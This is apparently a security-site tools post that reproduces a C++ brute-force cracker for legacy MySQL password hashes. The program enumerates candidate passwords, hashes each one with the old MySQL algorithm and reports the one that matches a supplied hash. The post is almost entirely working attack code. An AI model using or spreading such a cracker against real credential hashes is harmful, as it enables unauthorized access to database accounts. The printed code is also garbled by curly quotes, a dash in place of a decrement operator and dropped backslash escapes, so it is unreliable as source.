‘MySQL Brute Force Password Hash Cracker’

Summary
Credit:

‘The information has been provided by Term.’


Details

‘///////////////////////////////////////////////////////////////////////////////////////////////
//
// MySQL brute force password attack
//
// to compile : g++ -omysqlpassword mysqlpassword.c -O6 -lm
//
// Written by : term@rmci.net, current version http://term.rmci.net/mysqlpassword.cpp
//
#include <iostream>
#include <stdio.h>
#include <math.h>
#include <stdlib.h>
#include <string.h> // memset
#include <unistd.h> // usleep

using namespace std;

struct rand_struct {
  unsigned long seed1,seed2,max_value;
  double max_value_dbl;
};

void make_scrambled_password(char *,const char *);
char *scramble(char *,const char *,const char *, int);

int brute(const char *password) {
  // Tune stuff here, change min / max for the char range to crack and width for max password width.
  unsigned int min=32,max=122,pos=0,width=11,max_pos=0;
  unsigned char data[255];
  register unsigned long long loops=0;
  char *encrypted_password = new char[255];
  memset(encrypted_password, 0, 255);
  memset((char*)&data, min, 255);
  while(width) {
    loops++;
    if(data[pos] != max) {
      data[pos]++;
    } else {
      for(register int i=pos; i<max; i++) {
        if(data[i] != max) {
          data[i]++;
          pos=i;
          break;
        }
      }

      if(pos>max_pos)
        max_pos=pos;

      for(register int i=pos-1; i >= 0; i–) {
        if(i==0 && data[i] == max) {
          data[i] = min;
          pos = 0;
          break;
        }
        if(data[i] != max || i==0) {
          pos = i;
          break;
        }
        data[i] = min;
      }
    }

    if(max_pos>width) {
      cout<<‘No match found'<<endl;
      width=0;
      return(0);
    }
    data[max_pos+1] = 0;
        make_scrambled_password(encrypted_password,(const char*)data);
    if(!strcmp(encrypted_password,password)) {
      cout<<‘MATCH [‘<<data<<‘] [‘<<encrypted_password<<‘]==[‘<<password<<‘]'<<endl;
      return(0);
    }
    data[max_pos+1] = min;
    if((loops%500000)==0) {
      cout<<‘[ ‘<<dec<<loops<<‘ ]’;
      for(int i=0; i<=max_pos; i++) {
          cout<<‘ 0x'<<hex<<(int)data[i];
      }
      data[max_pos+1] = 0;
      cout<<‘ (‘<<data<<‘)’;
      data[max_pos+1] = min;
      cout<<endl;
    }
  }
}

int main(int argc, char* argv[]) {
  if(argc!=2) {
    fprintf(stderr,’usage : %s [ENCRYPTED MYSQL PASSWORD]nexample , 5d2e19393cc5ef67 is encrypted value ‘password’ : %s 5d2e19393cc5ef67n’,argv[0],argv[0]);
    return(0);
  }
  brute(argv[1]);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////
//
// thx mysql source ^_^
//
void randominit(struct rand_struct *rand_st,ulong seed1, ulong seed2) {
  rand_st->max_value= 0x3FFFFFFFL;
  rand_st->max_value_dbl=(double) rand_st->max_value;
  rand_st->seed1=seed1%rand_st->max_value ;
  rand_st->seed2=seed2%rand_st->max_value;
}
static void old_randominit(struct rand_struct *rand_st,ulong seed1) {
  rand_st->max_value= 0x01FFFFFFL;
  rand_st->max_value_dbl=(double) rand_st->max_value;
  seed1%=rand_st->max_value;
  rand_st->seed1=seed1 ; rand_st->seed2=seed1/2;
}
double rnd(struct rand_struct *rand_st) {
  rand_st->seed1=(rand_st->seed1*3+rand_st->seed2) % rand_st->max_value;
  rand_st->seed2=(rand_st->seed1+rand_st->seed2+33) % rand_st->max_value;
  return(((double) rand_st->seed1)/rand_st->max_value_dbl);
}
inline void hash_password(ulong *result, const char *password) {
  register ulong nr=1345345333L, add=7, nr2=0x12345671L;
  ulong tmp;
  for (; *password ; password++) {
    if (*password == ‘ ‘ || *password == ‘t’)
      continue;
  tmp= (ulong) (unsigned char) *password;
  nr^= (((nr & 63)+add)*tmp)+ (nr << 8);
  nr2+=(nr2 << 8) ^ nr;
  add+=tmp;
  }
  result[0]=nr & (((ulong) 1L << 31) -1L); /* Don’t use sign bit (str2int) */;
  result[1]=nr2 & (((ulong) 1L << 31) -1L);
  return;
}
inline void make_scrambled_password(char *to,const char *password) {
  ulong hash_res[2];
  hash_password(hash_res,password);
  sprintf(to,’%08lx%08lx’,hash_res[0],hash_res[1]);
}
static inline uint char_val(char X) {
  return (uint) (X >= ‘0’ && X <= ‘9’ ? X-‘0’ : X >= ‘A’ && X <= ‘Z’ ? X-‘A’+10 : X-‘a’+10);
}
char *scramble(char *to,const char *message,const char *password, int old_ver) {
  struct rand_struct rand_st;
  ulong hash_pass[2],hash_message[2];
  if(password && password[0]) {
    char *to_start=to;
    hash_password(hash_pass,password);
    hash_password(hash_message,message);
    if (old_ver)
      old_randominit(&rand_st,hash_pass[0] ^ hash_message[0]);
    else
      randominit(&rand_st,hash_pass[0] ^ hash_message[0],
    hash_pass[1] ^ hash_message[1]);
    while (*message++)
      *to++= (char) (floor(rnd(&rand_st)*31)+64);
    if (!old_ver) {
      char extra=(char) (floor(rnd(&rand_st)*31));
      while(to_start != to)
        *(to_start++)^=extra;
    }
  }
  *to=0;
  return to;
}’

Categories: Tools